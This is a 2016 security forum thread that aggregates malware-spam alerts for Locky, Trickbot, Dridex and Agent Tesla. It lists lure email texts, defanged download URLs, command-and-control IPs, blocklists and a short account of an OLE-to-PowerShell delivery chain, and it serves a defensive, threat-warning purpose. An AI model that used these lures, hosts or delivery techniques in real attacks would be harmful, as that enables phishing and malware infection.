The sender name varies from message to message. Attached is a ZIP file named in a similar way to payment_history_aecca55b.zip containing a malicious VBS script... (e.g. payment history 6848D10A PDF.vbs). You can see some of the activities of these script in these automated analyses [1] [2].
There are many different variants of the script, downloading components...
(Many domain-names listed at the dynamoo URL above.)
... (Thank you to my usual source for this data). The malware phones home to:
83.217.11.193/linuxsucks .php [hostname: artkoty.fortest .website] (Park-web Ltd, Russia)
46.148.26.99/linuxsucks .php [hostname: tarasik1.infium .net] (Infium, UAB, Ukraine)
194.1.239.152/linuxsucks .php (Internet Hosting Ltd, Russia)
91.230.211.150/linuxsucks .php [hostname: tarasik.freeopti .ru] (Optibit LLC, Russia)
185.154.13.79/linuxsucks .php (Dunaevskiy Denis Leonidovich, Ukraine) ...
A DLL is dropped with a detection rate of 12/57*.
Recommended blocklist:
83.217.11.193
46.148.26.99
194.1.239.152
91.230.211.150
185.154.13.79 "
1] https://malwr.com/analysis/ZGFmYzVlM2YxYzQyNDM5YWFiNjNjNTNjZjRjNWQ4MmU/
Hosts
185.2.128.114
46.148.26.99

2] https://www.hybrid-analysis.com/sam...564c4221898fc69e5dc621ce10e?environmentId=100
Contacted Hosts
185.2.128.114
185.154.13.79
83.217.11.193
194.1.239.152
91.230.211.150
46.148.26.99

* https://virustotal.com/en/file/7f18...e15bad15df7c33c7d40ca243a6dcce904b6/analysis/
___

Fake 'Document' SPAM - delivers trickbot banking Trojan
- https://myonlinesecurity.co.uk/docu...ain-malspam-delivers-trickbot-banking-trojan/
28 Oct 2016 - "An email with the subject of 'Document' from random names pretending to come from random name <random.name@ victim domain .tld> with a malicious word doc attachment delivers a trickbot banking Trojan... This uses a somewhat complicated method of delivery to try to bypass antivirus and content protection, but basically the macro inside the word doc creates a lnk file, calls on powershell to run the lnk file which connects to the web server to download a file, which is in turn renamed, moved & autorun by the powershell instruction inside the macro. The alleged senders name matches the subject line, the name in the body of the email and the document name... The email looks like:
From: Tommy Griggs <Tommy.Griggs@ oneknight .co.uk>
Date: Fri 28/10/2016 02:37
Subject: Document from Griggs
Attachment: Griggs-2810-824.doc
My company sent you a document. Check it attached.
Regards,
Tommy Griggs
Challenger Limited

28 October 2016: Griggs-2810-824.doc - Current Virus total detections 3/53*
Payload Security** shows a download from futuras .com/ksdjgdfhmsc.exe (VirusTotal 12/57***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...5e2ac74d4c3aa12d300ecf9b/analysis/1477637824/

** https://www.hybrid-analysis.com/sam...9935e2ac74d4c3aa12d300ecf9b?environmentId=100
Contacted Hosts
203.199.134.21
78.47.139.102
91.219.28.77
80.79.114.179
193.124.177.117

*** https://www.virustotal.com/en/file/...7084ab878a144ed5550d4e79/analysis/1477629101/
___

Dridex - new "0-Day-Distribution" method
- https://payload-security.blogspot.co.uk/2016/10/on-dridex-and-new-zero-day-distribution_27.html
Oct 27, 2016 - "The banking trojan Dridex (also known as Cridex, Feodo, Geodo, etc.) has been distributed in the past via malicious documents containing macros sent by E-Mail. Just yesterday we discovered a new distribution method that is undetected by the various Sandbox solutions we have access to and all AV engines. We were able to happily share and send those infected files via Skype, Gmail and other platforms. So while Dridex itself isn't new, the distribution method definitely is - and it will be very successful looking at current 0% detection ratio. In a sense, it is a "zero-day-distribution" method so we decided to use that term...
> https://3.bp.blogspot.com/-DTnOJp68...3edw1EP95-wy2o9EP18HBsCse5LACLcB/s1600/vt.png
As has been a recent trend we see for targetted attacks (more on that later), this malicious Office file does not contain any macros (or exploits, actually) to execute the payload... Instead, the document contains an embedded file, which can be extracted from the "oleObject1.bin" file in the "embeddings" folder. In this case, as it is a Word file, the relative pathway would be word/embeddings/oleObject1.bin... Simply opening the document will cause nothing to happen initially. Instead, the embedded file has to be double-clicked. This is the first "hurdle" that most Sandbox systems will have difficulties with:
> https://3.bp.blogspot.com/-4gHVNlGD...ura+de+pantalla+2016-10-26+a+las+19.50.17.png
After double-clicking the file - on a default configured system - an additional prompt will have to be passed:
> https://2.bp.blogspot.com/-sjrRV6nA...ura+de+pantalla+2016-10-26+a+las+20.26.36.png
... only if we -click- "Open" on that prompt, the actual LNK file and consequently the Command Prompt -> Powershell execution chain will trigger and download Dridex..."
(More detail at the payload-security URL above.)

>> https://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
___

'Your Bill' is -Not- Overdue ... Locky
- https://isc.sans.edu/diary.html?storyid=21647
2016-10-27 - "... It looks like today's ransomware subject is 'Your Bill is Overdue'. But then again, don't bother blocking it. Block ZIP'ed visual basic scripts. This round of Locky makes blocking a tad harder by using 'application/octet-stream' as a Content-Type instead of 'application/zip'... I received just about 1,000 attachments like that, and about 4000 total..."

:fear::fear: :mad:
 
Last edited:
Fake 'Wrong tracking number', 'SureVoIP', 'electronic billing', 'BANK SLIP' SPAM

FYI...

Fake 'Wrong tracking number' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-wrong-tracking-number.html
31 Oct 2016 - "This spam email leads to Locky ransomware:
From "Samuel Rodgers"
Date Mon, 31 Oct 2016 15:21:22 +0530
Subject Wrong tracking number
It looks like the delivery company gave us the wrong tracking number.
Please contact them as soon as possible and ask them regarding the shipment number 302856 information attached.

The name of the sender varies. Attached is a ZIP file named in a format similar to tracking_number_8b5b0ab.zip which in turn contains a malicious VBS script... named something like tracking number A99DB PDF.vbs... full list of download locations...
(Long list of domain-names at the dynamoo URL above.)
The malware phones home to:
91.107.107.241/linuxsucks .php [hostname: cfaer12.example .com] (Cloudpro LLC, Russia)
95.163.107.41/linuxsucks .php [hostname: shifu05 .ru] (JSC Digital Network, Russia)
146.120.89.98/linuxsucks .php (Ukrainian Internet Names Center aka ukrnames .com, Ukraine)
194.1.239.152/linuxsucks .php (Internet Hosting Ltd aka majorhost .net, Russia)
5.187.7.111/linuxsucks. php (Fornet Hosting, Spain)
Recommended blocklist:
5.187.7.111
91.107.107.241
95.163.107.41
146.120.89.98
194.1.239.152 "

- https://myonlinesecurity.co.uk/malspam-email-wrong-tracking-number-delivers-locky/
31 Oct 2016 - "... Locky downloader... an email with the subject of 'Wrong tracking number' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with tracking_number_ containing a VBS file that pretends to be a PDF... similar to recent Locky malspam[1] where the download is an actual executable file, not an encrypted file needing decoding, although called a txt file. The VBS just renames it to the dll name...
1] https://myonlinesecurity.co.uk/please-review-malspam-delivers-locky-thor-version/

31 October 2016: tracking_number_aa587827b.zip: Extracts to: tracking number A1964B3 PDF.vbs
Current Virus total detections 6/55*. Payload Security** seems unable to get any payload from this vbs although manual analysis easily revealed the download locations:
http ://business-cambodia .com/he8wtc | http ://archilog .at/imwjmt | http ://badznaptak .pl/inlgm49
http ://aconetrick .com/6yoajl7 | http ://ficussalm .com/8pmjmwp
All these files are executable files and the VBS just renames them to a DLL and autoruns it VirusTotal 14/57[3]...
One of the emails looks like:
From: Eldridge Beard <Beard.69896@ srimina .com>
Date: Mon 31/10/2016 09:05
Subject: Wrong tracking number
Attachment: tracking_number_aa587827b.zip
It looks like the delivery company gave us the wrong tracking number. Please contact them as soon as possible and ask them regarding the shipment number 302856 information attached.

The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...6e3ec12577eac9d6922ec06d/analysis/1477906017/

** https://www.hybrid-analysis.com/sam...9966e3ec12577eac9d6922ec06d?environmentId=100

3] https://www.virustotal.com/en/file/...bf56cd07de8ba42410c22940/analysis/1477908982/
___

Fake 'SureVoIP' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-surevoip-voicemail-from.html
31 Oct 2016 - "This -fake- voicemail message leads to Locky ransomware:
Subject: Voicemail from Catalina rigby 02355270166 <02355270166> 00:01:22
From: SureVoIP (voicemailandfax@[redacted])
Date: Monday, 31 October 2016, 11:17
Message From "Catalina rigby 02355270166" 02355270166
Created: 2016.10.31 14:46:53 PM
Duration: 00:01:22
Account: voicemailandfax@ [redacted]

Details will vary from message to message. Attached is a ZIP file with a name similar to msg_252f-477a-6bd9-371f-330671579edb.zip which contains a malicious WSF script. My source tells me that the various scripts the download a component...
(Long list of domain-names at the dynamoo URL above.)
The C2 servers overlap with the ones found here.
91.107.107.241/linuxsucks .php [hostname: cfaer12.example .com] (Cloudpro LLC, Russia)
95.163.107.41/linuxsucks .php [hostname: shifu05 .ru] (JSC Digital Network, Russia)
146.120.89.98/linuxsucks .php (Ukrainian Internet Names Center aka ukrnames .com, Ukraine)
Recommended blocklist:
5.187.7.111
91.107.107.241
95.163.107.41
146.120.89.98
194.1.239.152 "
___

Fake 'electronic billing' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/malspam-email-thanks-for-using-electronic-billing-delivers-locky/
31 Oct 2016 - "... Locky downloader... an email with the subject of 'Document No 50319282' (random numbers) pretending to come from accounts @ your own email address with a semi-random named zip attachment starting with file containing a WSF file... One of the emails looks like:
From: NANNIE DONNELLY <accounts@ [redacted] .co.uk>
Date: Thu 01/09/2016 19:22
Subject: Document No 50319282
Attachment: File 50319282.zip
Thanks for using electronic billing
Please find your document attached
Regards
NANNIE DONNELLY

31 October 2016: File 50319282.zip: Extracts to: XY4918-1310.wsf - Current Virus total detections 10/55*
MALWR** shows a download of a file from
http ://www .shavash .ir/g7cberv?LoeMqQM=BQqhBkykpgn which is renamed by the script to hndYhViGx1.dll
(VirusTotal 8/56***). C2 are http ://95.163.107.41 /linuxsucks.php and http ://tdhyjfxltpj .pw/linuxsucks.php
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...5a23990639c6b90858adcc5c/analysis/1477916645/

** https://malwr.com/analysis/M2JiZTcwOWI2MjFlNDQ1NGEyYjUxODc2ZTdkYzEyMWU/
Hosts
136.243.80.209
146.120.89.98
91.107.107.241
95.163.107.41
192.42.116.41

*** https://www.virustotal.com/en/file/...57be1e0bbd169e04419c2326/analysis/1477926737/
___

Fake 'BANK SLIP' SPAM - delivers Tesla keylogger
- https://myonlinesecurity.co.uk/malspam-email-bank-slip-delivers-unknown-malware/
31 Oct 2016 - "... malware delivery email... an email with the subject of 'BANK SLIP' coming as usual from what looks like random companies, names and email addresses with a zip attachment that contains some unknown malware. VirusTotal only shows generic detections...
Update: I am being reliably informed that it is Agent Tesla keylogger* that sends info home to aqeel@ ubsrwp .pk . A recent similar attack but using malicious word docs with macros to deliver the payload is described HERE** with screenshots and a good description of the information...
* https://twitter.com/malwrhunterteam/status/793018062953938944

** https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting

31 October 2016: Bank Slip.zip: Extracts to: Bank Slip.exe - Current Virus total detections 9/57[3]
MALWR doesn’t show much [4]. | Payload Security[5]...
3] https://www.virustotal.com/en/file/...b185e0fce4f219286e1ef690/analysis/1477892702/

4] https://malwr.com/analysis/YzNhYzBhYmNkY2Q2NGQ3MDkzY2UyYzM5YTkxZDIxZGM/

5] https://www.hybrid-analysis.com/sam...c8bb185e0fce4f219286e1ef690?environmentId=100

One of the emails looks like:
From: wagagrove@ otbsporti.com
Date: Thu 01/09/2016 19:22
Subject: BANK SLIP
Attachment: Bank Slip.zip
Dear Sir,
Pleased be informed payment done as attached.
Regards,
Waga
Sales/Account Department
MOTOTECHNICA SOLUTION LTD.
GST NO : 0018898212965 ...

The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

ubsrwp .pk: 198.24.190.35: https://www.virustotal.com/en/ip-address/198.24.190.35/information/

:fear::fear: :mad:
 
Last edited:
You must log in or register to reply here.
Back
Top